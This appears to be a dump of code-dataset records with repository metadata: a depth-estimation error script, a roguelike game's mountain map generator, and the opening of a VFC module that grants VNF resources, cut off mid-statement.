mse_norm_initial = []
for file in files:  # ["frame_0001.dpt"]:
    truth = depth_read(os.path.join(truth_path, file))
    depth = depth_read(os.path.join(depth_path, file))
    #depth = resize(depth, truth.shape)
    depth_initial = depth_read(os.path.join(initial_path, file))
    #depth_initial = resize(depth_initial, truth.shape)
    truth[truth == 100000000000.0] = np.nan
    truth = resize(truth, depth.shape)
    depth_norm = depth * scale_factor
    depth_norm_initial = depth_initial * scale_factor_initial

    distance = (truth - depth)
    distance_norm = (truth - depth_norm)
    ml1.append((np.abs(distance)).mean(axis=None))
    mse.append((np.square(distance)).mean(axis=None))
    ml1_norm.append((np.abs(distance_norm)).mean(axis=None))
    mse_norm.append((np.square(distance_norm)).mean(axis=None))

    distance_initial = (truth - depth_initial)
    distance_norm_initial = (truth - depth_norm_initial)
    ml1_initial.append((np.abs(distance_initial)).mean(axis=None))
    mse_initial.append((np.square(distance_initial)).mean(axis=None))
    ml1_norm_initial.append((np.abs(distance_norm_initial)).mean(axis=None))
    mse_norm_initial.append((np.square(distance_norm_initial)).mean(axis=None))

    print("\n" + file + ":")
    print("min(t,d,n,i):")
    print(np.nanmin(truth))
    print(np.nanmin(depth))
    print(np.nanmin(depth_norm))
    print(np.nanmin(depth_initial))
    print("max(t,d,n,i):")
    print(np.nanmax(truth))
    print(np.nanmax(depth))
    print(np.nanmax(depth_norm))
    print(np.nanmax(depth_initial))
    print("Avg(t,d,n,i):")
    print(np.nanmean(truth))
    print(np.nanmean(depth))
    print(np.nanmean(depth_norm))
    print(np.nanmean(depth_initial))
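# Metric naming used in the summary below: Ml1 is the mean absolute (L1) error
# and MSE the mean squared error against the Sintel ground truth; the "(norm)"
# variants first rescale predictions by the statistical scale factor computed
# above, removing the unknown global scale of monocular depth estimates.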
#print(mse)
print("ScaleFactor: " + str(scale_factor))
print("Results (Fine-Tuned):")
aml1 = np.nanmean(ml1)
amse = np.nanmean(mse)
print("Ml1: " + str(aml1))
print("MSE: " + str(amse))
aml1_norm = np.nanmean(ml1_norm)
amse_norm = np.nanmean(mse_norm)
print("Ml1(norm): " + str(aml1_norm))
print("MSE(norm): " + str(amse_norm))
print("\nResults (Initial):")
aml1_initial = np.nanmean(ml1_initial)
amse_initial = np.nanmean(mse_initial)
print("Ml1: " + str(aml1_initial))
print("MSE: " + str(amse_initial))
aml1_norm_initial = np.nanmean(ml1_norm_initial)
amse_norm_initial = np.nanmean(mse_norm_initial)
print("Ml1(norm): " + str(aml1_norm_initial))
print("MSE(norm): "+str(amse_norm_initial)) | 33.595092 | 153 | 0.721695 | 843 | 5,476 | 4.501779 | 0.183867 | 0.052174 | 0.031621 | 0.023715 | 0.465876 | 0.352833 | 0.240316 | 0.192885 | 0.155995 | 0.140184 | 0 | 0.029885 | 0.113952 | 5,476 | 163 | 154 | 33.595092 | 0.752267 | 0.159606 | 0 | 0.107143 | 0 | 0.008929 | 0.11775 | 0.026264 | 0 | 0 | 0 | 0.006135 | 0.017857 | 1 | 0.008929 | false | 0 | 0.089286 | 0 | 0.107143 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c8668c7c7bb6c29a806eaa8d8f7bd5230f9648a | 24,684 | py | Python | mountain_cartographer.py | Naburimannu/beyaz-dag | 50dbe54c8cffecafcf209b30f44bd326d84a424c | [
"BSD-3-Clause"
] | 1 | 2018-02-23T17:31:08.000Z | 2018-02-23T17:31:08.000Z | mountain_cartographer.py | Naburimannu/beyaz-dag | 50dbe54c8cffecafcf209b30f44bd326d84a424c | [
"BSD-3-Clause"
] | 2 | 2016-03-15T04:39:46.000Z | 2016-03-15T04:43:00.000Z | mountain_cartographer.py | Naburimannu/beyaz-dag | 50dbe54c8cffecafcf209b30f44bd326d84a424c | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2016 Thomas C. Hudson
# Governed by the license described in LICENSE.txt
import libtcodpy as libtcod
import cProfile
import scipy.spatial.kdtree
import config
import algebra
import map
import log
from components import *
import miscellany
import bestiary
import ai
import actions
import spells
import quest
import compound_cartographer
import mine_cartographer
import ca_cartographer
import dungeon_cartographer
ROOM_MAX_SIZE = 10
ROOM_MIN_SIZE = 6
MAX_ROOMS = 30
QUARRY_ELEVATION = 3
GHUL_COUNT_GOAL = 2
MINE_ENTRANCE_COUNT = 3
def _random_position_in_region(new_map, region):
    """
    Given a region of a map, return an algebra.Location in the region
    """
    center = new_map.region_seeds[region]
    while True:
        candidate = algebra.Location(
            libtcod.random_get_int(0, center[0]-5, center[0]+5),
            libtcod.random_get_int(0, center[1]-5, center[1]+5))
        if (candidate.x < 0 or candidate.y < 0 or
                candidate.x >= new_map.width or
                candidate.y >= new_map.height):
            continue
        if new_map.region[candidate.x][candidate.y] == region:
            return candidate


def _random_choice_index(chances):
    """
    choose one option from list of chances, returning its index
    """
    dice = libtcod.random_get_int(0, 1, sum(chances))
    running_sum = 0
    choice = 0
    for w in chances:
        running_sum += w
        if dice <= running_sum:
            return choice
        choice += 1


def _random_choice(chances_dict):
    """
    choose one option from dictionary of chances, returning its key
    """
    chances = chances_dict.values()
    strings = chances_dict.keys()
    return strings[_random_choice_index(chances)]
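# Example: _random_choice({'deer': 10, 'wolf': 5}) returns 'deer' with
# probability 10/15 and 'wolf' with probability 5/15. In the spawn tables
# below, keys are creature factories (or None for "spawn nothing") and values
# are relative weights.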
def _place_random_creatures(new_map, player):
    start_region = new_map.region[player.pos.x][player.pos.y]
    terrain_chances = {
        'lake': {None: 10},
        'marsh': {None: 10, bestiary.swamp_goblin: 10},
        'desert': {None: 20, bestiary.hyena_pair: 5, bestiary.gazelle: 10},
        'scrub': {None: 20, bestiary.hyena: 2, bestiary.gazelle: 4,
                  bestiary.deer: 4, bestiary.wolf: 2},
        'forest': {None: 20, bestiary.deer: 10, bestiary.wolf_pair: 5,
                   bestiary.bear: 3},
        'rock': {None: 10, bestiary.snow_leopard: 1},
        'ice': {None: 10, bestiary.snow_leopard: 1}
    }
    for r in range(len(new_map.region_seeds)):
        if (r == start_region or
                (new_map.quarry_regions and r in new_map.quarry_regions)):
            continue
        fn = _random_choice(terrain_chances[new_map.region_terrain[r]])
        if fn is not None:
            pos = algebra.Location(new_map.region_seeds[r][0], new_map.region_seeds[r][1])
            while new_map.is_blocked_at(pos):
                pos += actions.random_direction()
                pos.bound(algebra.Rect(0, 0, new_map.width-1, new_map.height-1))
            if new_map.caravanserai and new_map.caravanserai.bounds.contains(pos):
                continue
            # print('Creature in region ' + str(r) + ' at ' + str(pos.x) + ' ' + str(pos.y))
            fn(new_map, pos, player)


def _inhabit_rotunda(new_map, peak):
    goddess = Object(algebra.Location(peak[0], peak[1]), '@', 'The White Goddess', libtcod.white, blocks=True,
                     interactable=Interactable(use_function=quest.goddess_charge))
    new_map.objects.append(goddess)


def _inhabit_quarry(new_map, player):
    for i in range(GHUL_COUNT_GOAL):
        rgn = new_map.quarry_regions[_random_choice_index([1 for ii in range(len(new_map.quarry_regions))])]
        ghul = bestiary.ghul(new_map, _random_position_in_region(new_map, rgn), player)
def _interpolate_heights(new_map, peak):
    print('Climbing the shoulders of the mountain')
    for p in range(len(new_map.region_elevations)):
        if new_map.region_elevations[p] > -1:
            continue
        dx = new_map.region_seeds[p][0] - peak[0]
        dy = new_map.region_seeds[p][1] - peak[1]
        p_distance = math.sqrt(dx*dx + dy*dy)
        # Hack - conical mountain, but not horrible.
        if dx < 0:
            cand_x = peak[0]
        elif dx == 0:
            cand_x = new_map.width
        else:
            cand_x = new_map.width - peak[0]
        if dy < 0:
            cand_y = peak[1]
        elif dy == 0:
            cand_y = new_map.height
        else:
            cand_y = new_map.height - peak[1]
        edge_distance = min(cand_x, cand_y)
        elevation = int(9 * ((edge_distance - p_distance) / edge_distance))
        new_map.region_elevations[p] = max(elevation, 0)
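# The formula above drops elevation linearly from 9 at the peak to 0 at the
# nearest map edge: a region seed halfway to the edge gets int(9 * 0.5) == 4,
# and anything at or beyond the edge distance clamps to 0.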
def _ensure_penultimate_height(new_map, peak, region_tree):
    """
    Worldgen will frequently generate a map with a peak at elevation 9,
    and nothing else above elevation 7, which prevents easy access to
    the summit.
    """
    for r in new_map.region_elevations:
        if r == 8:
            print('Found height 8 at index ' + str(r))
            return
    (d, i) = region_tree.query(peak, 8)
    for r in i:
        if new_map.region_elevations[r] == 9:
            continue
        if new_map.region_elevations[r] == 8:
            print('Error? There was no 8, and now there is.')
            return
        if new_map.region_elevations[r] == 7:
            new_map.region_elevations[r] = 8
            print('Changed height 7 to 8 at index ' + str(r))
            return
    print("Couldn't find elevation 8 near the peak.")


def _extend_hills(new_map, peak):
    print('Raising the southern hills')
    dy = new_map.height - peak[1]
    x_intercept = peak[0] + dy / 2
    for r in range(len(new_map.region_seeds)):
        seed = new_map.region_seeds[r]
        if new_map.region_elevations[r] > 4:
            continue
        if seed[1] < peak[1]:
            continue
        local_dy = seed[1] - peak[1]
        midline = peak[0] + local_dy / 2
        dx = abs(midline - seed[0])
        if (dx > 40):
            continue
        e = int(4 - dx / 10)
        if new_map.region_elevations[r] < e:
            new_map.region_elevations[r] = e
def _place_seaside_height(new_map):
    """
    Guarantee that there's at least one elevated spot along the seaside
    """
    for r in range(20, 80):
        if (new_map.region_elevations[r] >= 2 and
                new_map.region_terrain[r-20] == 'lake'):
            new_map.grotto_region = r
            return

    # Rather than looking for a "best" location,
    # place it as soon as possible.
    for r in range(20, 80):
        print(r, new_map.region_terrain[r], new_map.region_elevations[r])
        if (new_map.region_terrain[r] == 'lake' or
                new_map.region_terrain[r] == 'marsh'):
            continue
        if new_map.region_terrain[r-20] != 'lake':
            print('Not lakeside...')
            continue
        new_map.region_elevations[r] = 1
        new_map.region_terrain[r] = 'scrub'
        new_map.grotto_region = r
        if (r+1)/20 == r/20:
            new_map.region_elevations[r+1] = 2
            new_map.region_terrain[r+1] = 'forest'
            new_map.grotto_region = r
        if (r+2)/20 == r/20:
            new_map.region_elevations[r+2] = 1
            new_map.region_terrain[r+2] = 'scrub'
        return
    print("Whoops! Can't find anywhere to place a seaside grotto.")
    new_map.grotto_region = None
def _should_slope(new_map, x, y):
    """
    True if any of the eight adjacent tiles is exactly one level higher than this one.
    """
    el = new_map.region_elevations[new_map.region[x][y]]
    return (new_map.elevation(x-1, y-1) == el+1 or
            new_map.elevation(x, y-1) == el+1 or
            new_map.elevation(x+1, y-1) == el+1 or
            new_map.elevation(x-1, y) == el+1 or
            new_map.elevation(x+1, y) == el+1 or
            new_map.elevation(x-1, y+1) == el+1 or
            new_map.elevation(x, y+1) == el+1 or
            new_map.elevation(x+1, y+1) == el+1)
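# Testing for exactly el+1 (rather than any higher neighbor) means slope tiles
# only appear as single-step ramps between adjacent terraces; a two-level
# jump gets no slope tile.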
def _find_terrain_types(new_map):
    strata = {x: [] for x in map.region_colors_seen.keys()}
    for r in range(len(new_map.region_terrain)):
        type = strata.get(new_map.region_terrain[r])
        type.append(r)
    return strata


def _mark_slopes(new_map):
    print('Finding the slopes')
    for x in range(1, config.OUTDOOR_MAP_WIDTH - 1):
        for y in range(1, config.OUTDOOR_MAP_HEIGHT - 1):
            if _should_slope(new_map, x, y):
                new_map.terrain[x][y] = map.TERRAIN_SLOPE


def _clump_terrain(new_map):
    print('Determining terrain clumps')
    for r in range(len(new_map.region_seeds)):
        el = new_map.region_elevations[r]
        seed = new_map.region_seeds[r]
        if el == 0:
            # Fill in the upper-left-hand corner so that the mountain
            # tends to be flush against the marsh & lake.
            in_corner = seed[0] + seed[1] < new_map.width * 0.75
            if seed[0] < 20 or (in_corner and seed[0] <= seed[1]):
                new_map.region_terrain[r] = 'lake'
            elif seed[1] < 20 or (in_corner and seed[1] < seed[0]):
                new_map.region_terrain[r] = 'marsh'
            else:
                new_map.region_terrain[r] = 'desert'
        elif el < 3:
            new_map.region_terrain[r] = 'scrub'
        elif el < 6:
            new_map.region_terrain[r] = 'forest'
        elif el < 7:
            new_map.region_terrain[r] = 'rock'
        else:
            new_map.region_terrain[r] = 'ice'
def _assign_terrain(new_map):
    terrain_lookup = {map.terrain_types[i].name: i
                      for i in range(len(map.terrain_types))}
    marsh_chances = {'water': 10, 'ground': 40, 'reeds': 10, 'saxaul': 10}
    desert_chances = {'ground': 80, 'nitraria': 5, 'ephedra': 5, 'boulder': 5}
    scrub_chances = {'ground': 40, 'nitraria': 10, 'ephedra': 10, 'boulder': 5}
    forest_chances = {'ground': 45, 'poplar': 15, 'boulder': 5}
    terrain_chances = {
        'lake': {'water': 10},
        'marsh': marsh_chances,
        'desert': desert_chances,
        'scrub': scrub_chances,
        'forest': forest_chances,
        'rock': {'ground': 45, 'boulder': 5},
        'ice': {'ground': 75, 'boulder': 5}
    }
    print('Assigning narrow terrain')
    for x in range(config.OUTDOOR_MAP_WIDTH):
        for y in range(config.OUTDOOR_MAP_HEIGHT):
            t = new_map.region_terrain[new_map.region[x][y]]
            if new_map.terrain[x][y] != map.TERRAIN_GROUND and t != 'lake':
                # For now don't overwrite slopes, except underwater
                continue
            new_map.terrain[x][y] = terrain_lookup[_random_choice(terrain_chances[t])]


def _make_rotunda(new_map, peak):
    """
    Create a rotunda on top of the mountain.
    This is always at the peak.
    """
    for x in range(peak[0]-3, peak[0]+4):
        for y in range(peak[1]-3, peak[1]+4):
            if new_map.elevation(x, y) != 9:
                # in theory would be better to glom onto a closer region
                # if one exists
                new_map.region[x][y] = new_map.region[peak[0]][peak[1]]
            # interior of rotunda is floor, edges are bare ground
            if (x > peak[0]-3 and x < peak[0]+3 and
                    y > peak[1]-3 and y < peak[1]+3):
                new_map.terrain[x][y] = map.TERRAIN_FLOOR
            elif new_map.terrain[x][y] != map.TERRAIN_SLOPE:
                new_map.terrain[x][y] = map.TERRAIN_GROUND
            if (x == peak[0]-2 or x == peak[0]+2 or
                    y == peak[1]-2 or y == peak[1]+2):
                # borders have alternating pillars
                if ((x - peak[0]) % 2 == 0 and
                        (y - peak[1]) % 2 == 0):
                    new_map.terrain[x][y] = map.TERRAIN_WALL
def _test_quarry_placement(new_map, region_span):
    """
    Look for a site of a given elevation in a particular consecutive range of regions.
    """
    for r in range(region_span[0], region_span[1]):
        if new_map.region_elevations[r] == QUARRY_ELEVATION:
            return r
    return None


def _mark_quarry_slopes(new_map, region):
    # BUG still not quite right?
    center = new_map.region_seeds[region]
    print('Centering quarry at ' + str(center[0]) + ' ' + str(center[1]))
    for x in range(max(center[0] - 10, 0), min(center[0] + 10, new_map.width - 1)):
        for y in range(max(center[1] - 10, 0), min(center[1] + 10, new_map.height - 1)):
            if _should_slope(new_map, x, y):
                # add new slopes within the quarry, if necessary
                if new_map.region[x][y] != region:
                    continue
                new_map.terrain[x][y] = map.TERRAIN_SLOPE
            else:
                if new_map.region[x][y] == region:
                    new_map.terrain[x][y] = map.TERRAIN_GROUND
                elif new_map.terrain[x][y] == map.TERRAIN_SLOPE:
                    # get rid of now-obsolete slopes nearby
                    new_map.terrain[x][y] = map.TERRAIN_GROUND
def _place_quarry(new_map, peak):
    """
    Looks for a site just below the top of the hills,
    south and ideally a little east of the peak.
    Sets new_map.quarry_regions
    """
    peak_region = new_map.region[peak[0]][peak[1]]
    column_start = peak_region + 20 * libtcod.random_get_int(0, 0, 2)
    column_end = (column_start / 20) * 20 + 19
    print('Searching for quarry between ' + str(column_start) + ' and ' + str(column_end))
    new_map.quarry_regions = None
    q_rgn = _test_quarry_placement(new_map, (column_start, column_end))
    if not q_rgn:
        q_rgn = _test_quarry_placement(new_map, (column_start+20, column_end+20))
    if not q_rgn:
        q_rgn = _test_quarry_placement(new_map, (column_start+40, column_end+40))
    if not q_rgn:
        q_rgn = _test_quarry_placement(new_map, (column_start-20, column_end-20))
    if not q_rgn:
        q_rgn = _test_quarry_placement(new_map, (column_start-40, column_end-40))
    if not q_rgn:
        return
    new_map.quarry_regions = [q_rgn]
    # Extend east, or west if that doesn't work
    if new_map.region_elevations[q_rgn+20] > 2:
        new_map.quarry_regions += [q_rgn+20]
    elif new_map.region_elevations[q_rgn-20] > 2:
        new_map.quarry_regions += [q_rgn-20]
    print('Quarry regions: ', new_map.quarry_regions)


def _dig_quarry(new_map, peak):
    """
    Sink the quarry regions to a low elevation and place mine entrances.
    """
    _place_quarry(new_map, peak)
    if not new_map.quarry_regions:
        print("Couldn't find anywhere to dig a quarry; sorry!")
        return

    # Doing this as originally envisioned would require switching to per-tile elevation
    # instead of per-region elevation.
    # Stopgap: drop the entire region, reevaluate for slopes,
    # and rewrite terrain.
    for rgn in new_map.quarry_regions:
        new_map.region_elevations[rgn] = 2
        new_map.region_terrain[rgn] = 'rock'
    for rgn in new_map.quarry_regions:
        _mark_quarry_slopes(new_map, rgn)

    stairheads = []
    for ii in range(MINE_ENTRANCE_COUNT):
        while True:
            rgn = new_map.quarry_regions[_random_choice_index([1 for ii in range(len(new_map.quarry_regions))])]
            pos = _random_position_in_region(new_map, rgn)
            sufficiently_distant = True
            for stair_pos in stairheads:
                # print('distance between ', pos, stair_pos, pos.distance(stair_pos))
                if pos.distance(stair_pos) < 5:
                    sufficiently_distant = False
            # Maybe try to enforce that it's near a cliff / slope...
            if sufficiently_distant:
                break
        stairheads.append(pos)

    # Arrange west-to-east to make it easier to dig below
    stairheads.sort(key=lambda pos: pos.x)
    new_map.quarry_stairs = []
    for ii in stairheads:
        stairs = Object(ii, '<', 'mine entrance', libtcod.white, always_visible=True)
        stairs.destination = None
        stairs.dest_position = None
        stairs.generator = mine_cartographer.make_map
        new_map.objects.insert(0, stairs)
        new_map.portals.insert(0, stairs)
        new_map.quarry_stairs.append(stairs)
def _make_grotto(new_map):
    if not new_map.grotto_region:
        return
    region_center = algebra.Location(new_map.region_seeds[new_map.grotto_region][0],
                                     new_map.region_seeds[new_map.grotto_region][1])
    print('Grotto at ' + str(region_center.x) + ' ' + str(region_center.y))
    stairs = Object(region_center, '<', 'cave mouth', libtcod.white, always_visible=True)
    stairs.destination = None
    stairs.dest_position = None
    stairs.generator = ca_cartographer.make_map
    new_map.objects.insert(0, stairs)
    new_map.portals.insert(0, stairs)
    new_map.grotto_stairs = region_center

    # Would be nice to have a structure around it, but for now just keep the top clear.
    for x in range(region_center.x - 2, region_center.x + 3):
        for y in range(region_center.y - 2, region_center.y + 3):
            if (new_map.region[x][y] == new_map.grotto_region
                    and new_map.terrain[x][y] != map.TERRAIN_SLOPE):
                new_map.terrain[x][y] = map.TERRAIN_GROUND


def _check_stair_position(stairheads, candidate):
    for prev_pos in stairheads:
        if candidate.distance(prev_pos) < 20:
            return False
    return True
def _site_final_dungeon(new_map, strata):
    other_stairs = new_map.quarry_stairs + [new_map.grotto_stairs]
    stairheads = []
    for type in ['rock', 'forest', 'forest']:
        regions = strata[type]
        while True:
            r = regions[new_map.rnd(0, len(regions) - 1)]
            pos = _random_position_in_region(new_map, r)
            if _check_stair_position(stairheads + other_stairs, pos):
                break
        stairheads.append(pos)
        print('Final dungeon entrance at ', pos)

    stairheads.sort(key=lambda pos: pos.x)
    new_map.dungeon_stairs = []
    for ii in stairheads:
        new_map.terrain[ii.x][ii.y] = map.TERRAIN_GROUND
        stairs = Object(ii, '<', 'cave mouth', libtcod.white, always_visible=True)
        stairs.destination = None
        stairs.dest_position = None
        stairs.generator = dungeon_cartographer.make_final_map
        new_map.objects.insert(0, stairs)
        new_map.portals.insert(0, stairs)
        new_map.dungeon_stairs.append(stairs)
        for x in range(ii.x - 2, ii.x + 3):
            for y in range(ii.y - 2, ii.y + 3):
                if (new_map.region[x][y] == new_map.region[ii.x][ii.y]
                        and new_map.terrain[x][y] != map.TERRAIN_SLOPE):
                    new_map.terrain[x][y] = map.TERRAIN_GROUND
def _debug_region_heights(new_map):
    for u in range(20):
        print(new_map.region_elevations[u:400:20])


def _debug_region_terrain(new_map):
    rt = ''
    for r in range(len(new_map.region_seeds)):
        if new_map.region_terrain[r] != None:
            rt += new_map.region_terrain[r][0]
        else:
            rt += str(new_map.region_elevations[r])
    for u in range(20):
        print(rt[u:400:20])
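# The 400 region seeds are appended column-by-column over a 20x20 grid of
# 10x10-tile cells (see _build_map below), so the stride-20 slices above print
# one band of that grid per line -- a rough ASCII picture of heights and biomes.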
def _build_map(new_map):
    new_map.rng = libtcod.random_new_from_seed(new_map.random_seed)

    print('Seeding regions')
    for u in range(config.OUTDOOR_MAP_WIDTH / 10):
        for v in range(config.OUTDOOR_MAP_HEIGHT / 10):
            x = libtcod.random_get_int(new_map.rng, 0, 9) + u * 10
            y = libtcod.random_get_int(new_map.rng, 0, 9) + v * 10
            new_map.region_seeds.append([x, y])

    print('Growing the world-tree')
    region_tree = scipy.spatial.KDTree(new_map.region_seeds)
    new_map.region_terrain = [None for i in range(len(new_map.region_seeds))]
    new_map.region_elevations = [-1 for r in range(len(new_map.region_seeds))]
    new_map.region_entered = [False for i in range(len(new_map.region_seeds))]
    new_map.elevation_visited = [False for i in range(0, 10)]

    print('Assigning regions')
    for x in range(config.OUTDOOR_MAP_WIDTH):
        for y in range(config.OUTDOOR_MAP_HEIGHT):
            (d, i) = region_tree.query([[x, y]])
            new_map.region[x][y] = i[0]
            new_map.terrain[x][y] = map.TERRAIN_GROUND

    peak = [libtcod.random_get_int(new_map.rng, int(config.OUTDOOR_MAP_WIDTH * .35), int(config.OUTDOOR_MAP_WIDTH * .65)),
            libtcod.random_get_int(new_map.rng, int(config.OUTDOOR_MAP_WIDTH * .35), int(config.OUTDOOR_MAP_WIDTH * .65))]
    print('The peak is at ' + str(peak[0]) + ', ' + str(peak[1]))
    for r in range(20):
        new_map.region_elevations[r] = 0
        new_map.region_elevations[380+r] = 0
        new_map.region_elevations[r*20] = 0
        new_map.region_elevations[r*20+19] = 0
    (d, peak_regions) = region_tree.query([peak], 3)
    for p in peak_regions[0]:
        new_map.region_elevations[p] = 9
    _interpolate_heights(new_map, peak)
    _ensure_penultimate_height(new_map, peak, region_tree)
    _extend_hills(new_map, peak)
    _debug_region_heights(new_map)
    _clump_terrain(new_map)
    _place_seaside_height(new_map)

    # TODO: level_desert() here to guarantee caravanserai is in the northeast
    # TODO: sink_quarry() here before we _mark_slopes
    # to get rid of messy after-the-fact slope fixup in dig_quarry()
    strata = _find_terrain_types(new_map)
    _debug_region_terrain(new_map)
    _mark_slopes(new_map)
    _assign_terrain(new_map)
    _make_rotunda(new_map, peak)
    compound_cartographer.make_caravanserai(new_map)
    _dig_quarry(new_map, peak)
    _make_grotto(new_map)
    _site_final_dungeon(new_map, strata)
    new_map.peak = peak
def _mountain_exploration(self, player):
    new_region = self.region[player.pos.x][player.pos.y]
    new_elevation = self.region_elevations[new_region]
    delta = 0
    if not self.region_entered[new_region]:
        delta += config.REGION_EXPLORATION_SP
        self.region_entered[new_region] = True
    if not self.elevation_visited[new_elevation]:
        delta += config.ELEVATION_EXPLORATION_SP
        self.elevation_visited[new_elevation] = True
    if delta > 0:
        player.skill_points += delta
        point = 'point'
        if delta > 1:
            point += 's'
        log.message('You gained ' + str(delta) + ' skill ' + point + ' for exploration.')
def make_map(player, dungeon_level):
    """
    Creates a new simple map at the given dungeon level.
    Sets player.current_map to the new map, and adds the player as the first
    object.
    """
    new_map = map.OutdoorMap(config.OUTDOOR_MAP_WIDTH, config.OUTDOOR_MAP_HEIGHT, dungeon_level)
    new_map.objects.append(player)
    player.current_map = new_map
    player.camera_position = algebra.Location(0, 0)
    new_map.random_seed = libtcod.random_save(0)
    _build_map(new_map)

    # Might want to change this later, but this is required in creature placement
    # routines so we know what region the player starts in so there isn't a
    # wandering monster jumping down their throat. Unless, of course, this
    # start point is on a *region border* and there's a monster in the next
    # region over...
    player.pos = algebra.Location(config.OUTDOOR_MAP_WIDTH - 8, 12)
    _place_random_creatures(new_map, player)
    _inhabit_rotunda(new_map, new_map.peak)
    if new_map.caravanserai:
        compound_cartographer.inhabit_caravanserai(new_map, player)
    if new_map.quarry_regions:
        _inhabit_quarry(new_map, player)

    # make sure we're not starting on top of an object or terrain feature
    while (new_map.terrain_at(player.pos).name != 'ground'):
        # subtle bug? doesn't use the map-building random number generator
        player.pos = player.pos + actions.random_direction()
        player.pos.bound(algebra.Rect(0, 0, new_map.width - 1, new_map.height - 1))

    new_map.initialize_fov()
    # setting an instancemethod breaks shelve save games
    # new_map.xp_visit = type(map.BaseMap.xp_visit)(_mountain_exploration, new_map, map.BaseMap)
    new_map.xp_visit = _mountain_exploration
    return True
def _test_map_repeatability():
    """
    Require that two calls to _build_map() with the same seed produce the
    same corridors and rooms.
    """
    map1 = map.OutdoorMap(config.MAP_WIDTH, config.MAP_HEIGHT, 3)
    map1.random_seed = libtcod.random_save(0)
    _build_map(map1)

    map2 = map.OutdoorMap(config.MAP_WIDTH, config.MAP_HEIGHT, 3)
    map2.random_seed = map1.random_seed
    _build_map(map2)

    assert map1.terrain == map2.terrain
    for i in range(len(map1.rooms)):
        assert map1.rooms[i] == map2.rooms[i]


if __name__ == '__main__':
    _test_map_repeatability()
    print('Cartographer tests complete.')
| 36.677563 | 122 | 0.624777 | 3,564 | 24,684 | 4.102974 | 0.138889 | 0.100527 | 0.073036 | 0.045134 | 0.442249 | 0.333311 | 0.24694 | 0.20413 | 0.168433 | 0.141626 | 0 | 0.023141 | 0.264706 | 24,684 | 672 | 123 | 36.732143 | 0.782534 | 0.117526 | 0 | 0.201245 | 0 | 0 | 0.045594 | 0 | 0 | 0 | 0 | 0.001488 | 0.004149 | 1 | 0.060166 | false | 0 | 0.037344 | 0 | 0.134855 | 0.051867 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c869ea13c57d3dfb524eb647b6f3d5f86eafa6e | 7,307 | py | Python | test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns_vnfs/biz/grant_vnf.py | lremember/VFC | 837559db1396091811382359100bfc60e1aab5b2 | [
"MIT"
] | 1 | 2019-10-10T00:52:18.000Z | 2019-10-10T00:52:18.000Z | test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns_vnfs/biz/grant_vnf.py | lremember/VFC-Files | 837559db1396091811382359100bfc60e1aab5b2 | [
"MIT"
] | null | null | null | test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns_vnfs/biz/grant_vnf.py | lremember/VFC-Files | 837559db1396091811382359100bfc60e1aab5b2 | [
"MIT"
] | null | null | null | # Copyright 2018 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import uuid
import time
from lcm.pub.database.models import NfInstModel, OOFDataModel
from lcm.pub.exceptions import NSLCMException
from lcm.pub.msapi.sdc_run_catalog import query_vnfpackage_by_id
from lcm.pub.utils.values import ignore_case_get
from lcm.pub.msapi import resmgr
from lcm.ns_vnfs.const import SCALAR_UNIT_DICT
logger = logging.getLogger(__name__)
class GrantVnf(object):
def __init__(self, grant_data):
self.data = grant_data
def exec_grant(self):
logger.debug("grant data from vnfm:%s", self.data)
if isinstance(self.data, str):
self.data = json.JSONDecoder().decode(self.data)
has_res_tpl = False
grant_type = None
action_type = ignore_case_get(self.data, "operation")
vimConnections = []
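# decide whether the grant already carries resource templates; if none are
# present they are rebuilt from the VNFD below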
if ignore_case_get(self.data, "addResources"):
grant_type = "addResources"
elif ignore_case_get(self.data, "removeResources"):
grant_type = "removeResources"
else:
has_res_tpl = True
for res in ignore_case_get(self.data, grant_type):
if "resourceTemplate" in res:
has_res_tpl = True
break
if not has_res_tpl:
m_vnf_inst_id = ignore_case_get(self.data, "vnfInstanceId")
additional_param = ignore_case_get(self.data, "additionalparams")
vnfm_inst_id = ignore_case_get(additional_param, "vnfmid")
vim_id = ignore_case_get(additional_param, "vimid")
if vnfm_inst_id and vnfm_inst_id != "":
vnfinsts = NfInstModel.objects.filter(
mnfinstid=m_vnf_inst_id, vnfm_inst_id=vnfm_inst_id)
else:
vnfinsts = NfInstModel.objects.filter(
mnfinstid=m_vnf_inst_id)
if not vnfinsts:
raise NSLCMException("Vnfinst(%s) is not found in vnfm(%s)" % (
m_vnf_inst_id, vnfm_inst_id))
vnf_pkg_id = vnfinsts[0].package_id
nfpackage_info = query_vnfpackage_by_id(vnf_pkg_id)
vnf_pkg = nfpackage_info["packageInfo"]
vnfd = json.JSONDecoder().decode(vnf_pkg["vnfdModel"])
req_param = {
"vnfInstanceId": m_vnf_inst_id,
"vimId": vim_id,
"vnfLcmOpOccId": ignore_case_get(self.data, "vnfLcmOpOccId"),
"additionalParams": additional_param,
grant_type: []
}
for res in ignore_case_get(self.data, grant_type):
vdu_name = ignore_case_get(res, "vdu")
grant_res = {
"resourceDefinitionId": ignore_case_get(res, "resourceDefinitionId"),
"type": ignore_case_get(res, "type"),
"vdu": vdu_name
}
for vdu in vnfd["vdus"]:
if vdu_name in (vdu["vdu_id"], vdu["properties"].get("name", "")):
grant_res["resourceTemplate"] = self.get_res_tpl(vdu, vnfd)
break
req_param[grant_type].append(grant_res)
self.data = req_param
tmp = resmgr.grant_vnf(self.data)
vimConnections.append(
